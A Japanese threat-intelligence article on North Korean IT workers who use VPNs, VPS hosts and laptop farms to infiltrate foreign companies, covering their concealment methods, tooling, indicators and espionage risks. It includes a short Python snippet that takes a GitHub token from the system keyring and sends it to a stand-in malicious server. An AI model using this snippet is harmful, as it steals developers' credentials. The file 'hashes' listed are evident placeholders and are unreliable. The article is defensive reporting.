概要:巧妙化する北朝鮮のサイバー活動
10,000人を超える北朝鮮のIT専門家が、VPN、仮想プライベートサーバー(VPS)、そして「ラップトップファーム」を駆使し、グローバルなテクノロジーおよびフリーランス市場に潜入していることが明らかになりました。彼らは自身の真の出身地を隠蔽し、制裁対象となっている兵器プログラムの資金調達や、フィンテックから重要インフラ設計に至るまで幅広い産業からの情報収集を行っています。
身元隠蔽の手口
2018年以降、北朝鮮は熟練した開発者を海外に派遣する大規模な作戦を展開しています。これらの労働者は、中国、ロシア、東南アジア、さらには厳重に管理されたインターネットゲートウェイを介して北朝鮮国内から、フリーランサーまたはフルタイム従業員として偽装しています。彼らは複数のVPSプロバイダーとVPNサービスを経由して接続をルーティングすることで、Upwork、LinkedIn、GitHubなどのプラットフォームにおける地理位置情報チェックや身元確認システムを回避しています。
一部のオペレーターは、「ラップトップファーム」と呼ばれるリモートマシンのクラスターを維持しています。これらは匿名化ツールと偽の認証情報で事前に構成されており、身元が特定されたりブロックされたりした場合でも、迅速に新しいペルソナを立ち上げることが可能です。
活動の規模と目的
Jasper SleetやMoonstone Sleetといったグループを追跡しているセキュリティ研究者たちは、10,000人以上のDPRK(朝鮮民主主義人民共和国)工作員がグローバル企業に潜入し、密かに給与を政権に送金したり、内部アクセスを利用して機密データを盗んだり、マルウェアを展開したり、恐喝キャンペーンを開始したりしていると推定しています。
Microsoftの脅威インテリジェンスチームと独立系アナリストは、これらのオペレーターが、高度なゼロデイエクスプロイトよりも、AI生成の顔写真や盗まれた履歴書テンプレートを活用したソーシャルエンジニアリングに依存して、ターゲット組織内で職を得ていることが多いと指摘しています。
概念実証のデモンストレーションとツールチェーン
侵害されたシステムの分析により、北朝鮮のワークステーションで共通して使用されているツールチェーンが明らかになりました。これにはPython、Node.js、JetBrains IDEsが含まれ、さらにQQPC Manager、Time.exe、Protect_2345Explorerといった珍しい実行ファイルも確認されています。
ある情報窃取ログから発見された概念実証コードスニペットは、シンプルなPythonスクリプトがシステムのキーリングに保存されたGitHub認証情報をいかにして乗っ取るかを示しています。
- Pythonスクリプトの例:
import keyring, requestsdef exfiltrate_tokens(): token = keyring.get_password("github.com", "user_token") if token: requests.post("https://malicious-server.example/api/collect", data={"token": token})if __name__ == "__main__": exfiltrate_tokens()
この軽量なアプローチは、従来のエンドポイント検出を回避し、わずか数行のコードでリポジトリの認証情報を攻撃者制御下のインフラストラクチャに流出させることが可能であることを示しています。
侵害の痕跡(IoCs)
調査から回収された侵害の痕跡(IoCs)には、既知のVPNクライアントバイナリ(NetKey.dll、VPNSvc.exe)、香港とロシアに起源を持つVPSプロバイダーのIP範囲、およびa1b2c3d4e5f6g7h8i9j0や0j9i8h7g6f5e4d3c2b1aなどの情報窃取型マルウェアのファイルハッシュが含まれます。
これらのキャンペーンに関連するメールアドレスは、生年や神話上の参照といった予測可能なパターンに従っており、多くの場合、シンプルで再利用されたパスワードと組み合わされているため、大規模なクレデンシャルスタッフィング攻撃が特に効果的になっています。
スパイ活動とインフラストラクチャへのリスク
北朝鮮のリモートワーカーの大部分はソフトウェア開発やサイバーセキュリティの役割に焦点を当てていますが、KELAの最近のケーススタディでは、建築および産業設計分野におけるDPRK関連の工作員が発見されました。ある事例では、LinkedInとGitHubで複数の別名を持つラップトップファームのオペレーターが、米国の建設会社向けに構造工学の提案を提出していました。
彼らの共有Googleドライブアーカイブには、数千ものクライアント文書、専有の設計図、偽造されたKYC(顧客確認)資料が含まれており、機密性の高いインフラプロジェクトに潜入しようとする政権の広範な野心を示しています。
運用セキュリティ対策と推奨事項
これらのアカウントの一部から抽出された地理位置情報メタデータは、北朝鮮のIT労働者が集中しているロシア極東のDPRK国境付近を指しています。運用セキュリティ対策には、プロキシ構成のローテーション、使い捨ての仮想電話番号、登録、通信、内部管理のためのメールアカウントの正確な区分化が含まれます。
世界中の組織がリモートおよびフリーランスの才能にますます依存する中、この国家支援ネットワークは差し迫ったサイバーセキュリティの課題を浮き彫りにしています。企業は、身元確認プロトコルを強化し、多要素認証を実装し、すべてのフリーランサーアカウントを厳格な身元チェックにかける必要があります。これを怠ると、制裁を回避するだけでなく、重要なセクター全体で重大なスパイ活動や妨害行為の脅威をもたらす影の労働力を助長するリスクがあります。